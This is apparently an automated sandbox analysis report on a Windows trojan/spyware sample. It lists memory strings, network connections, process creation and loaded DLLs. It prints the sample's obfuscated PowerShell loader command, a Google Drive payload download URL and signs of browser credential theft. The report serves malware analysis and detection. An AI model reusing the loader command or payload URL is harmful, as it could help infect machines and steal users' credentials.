          Source: msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK&export=download#
          Source: msiexec.exe, 0000000E.00000002.2530341209.00000000076BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2198114820.00000000076D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18GDFt_ZOKNVTpBCxpn0qONS4Jp9t5dzK&export=download)
          Source: msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2036575902.00000000049D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2040272132.00000000058E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 0000000E.00000002.2542418088.00000000231EA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002325A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 0000000E.00000002.2542418088.00000000231EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 0000000E.00000002.2542418088.000000002325A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
          Source: msiexec.exe, 0000000E.00000002.2542418088.0000000023214000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002325A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
          Source: msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2162950131.00000000076D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2162950131.00000000076D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2162950131.00000000076D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 0000000E.00000002.2543825754.00000000244A4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2543825754.00000000241C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2162950131.00000000076D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 0000000E.00000003.2169875978.00000000076C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2169955771.00000000076CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000003.2162950131.00000000076D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: msiexec.exe, 0000000E.00000002.2542418088.000000002335B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002334C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 0000000E.00000002.2542418088.000000002334C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/X
          Source: msiexec.exe, 0000000E.00000002.2542418088.0000000023356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
          Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.2.7:49971 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49972 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49985 version: TLS 1.2
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\argoters\Necrotizing\Programbibliotekets\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeJump to dropped file
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_00406B150_2_00406B15
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_004072EC0_2_004072EC
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_00404C9E0_2_00404C9E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02B7E2602_2_02B7E260
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0726C0C62_2_0726C0C6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3D2CB14_2_02E3D2CB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3536214_2_02E35362
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3C14614_2_02E3C146
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3C78814_2_02E3C788
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3D59914_2_02E3D599
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3CA5814_2_02E3CA58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3CFF714_2_02E3CFF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3EC1814_2_02E3EC18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3CD2814_2_02E3CD28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3F7F114_2_02E3F7F1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E33E0914_2_02E33E09
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E36FC814_2_02E36FC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3FC4814_2_02E3FC48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E3EC0B14_2_02E3EC0B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_02E39DE014_2_02E39DE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574D0D014_2_2574D0D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25746A8014_2_25746A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574356014_2_25743560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574194014_2_25741940
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574612014_2_25746120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574611014_2_25746110
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574450014_2_25744500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_257441E014_2_257441E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_257425C014_2_257425C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_257409A014_2_257409A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574518014_2_25745180
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25741C6014_2_25741C60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574004014_2_25740040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574644014_2_25746440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574482014_2_25744820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25742C0014_2_25742C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574E80814_2_2574E808
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_257444F114_2_257444F1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_257428E014_2_257428E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25740CC014_2_25740CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_257454A014_2_257454A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574388014_2_25743880
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574036014_2_25740360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574676014_2_25746760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25744B4014_2_25744B40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25742F2014_2_25742F20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574130014_2_25741300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25740FE014_2_25740FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_257457C014_2_257457C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25743BA014_2_25743BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25741F8014_2_25741F80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25744E6014_2_25744E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574324014_2_25743240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574162014_2_25741620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574961114_2_25749611
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25745E0014_2_25745E00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25745AE014_2_25745AE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_25743EC014_2_25743EC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_257422A014_2_257422A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_2574068014_2_25740680
          Source: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/13@5/5
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404722
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeFile created: C:\Users\user\AppData\Roaming\argotersJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_03
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsrB7C1.tmpJump to behavior
          Source: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: msiexec.exe, 0000000E.00000002.2542418088.00000000233DB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002341B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.000000002340F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.00000000233CB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2542418088.00000000233E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeReversingLabs: Detection: 15%
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeFile read: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe "C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe"
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Havegrund=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\Gtevielsen.Pro';$Enmotoret=$Havegrund.SubString(14070,3);.$Enmotoret($Havegrund)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Havegrund=Get-Content -Raw 'C:\Users\user\AppData\Roaming\argoters\Necrotizing\Ukristeligheden\Gtevielsen.Pro';$Enmotoret=$Havegrund.SubString(14070,3);.$Enmotoret($Havegrund)" Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
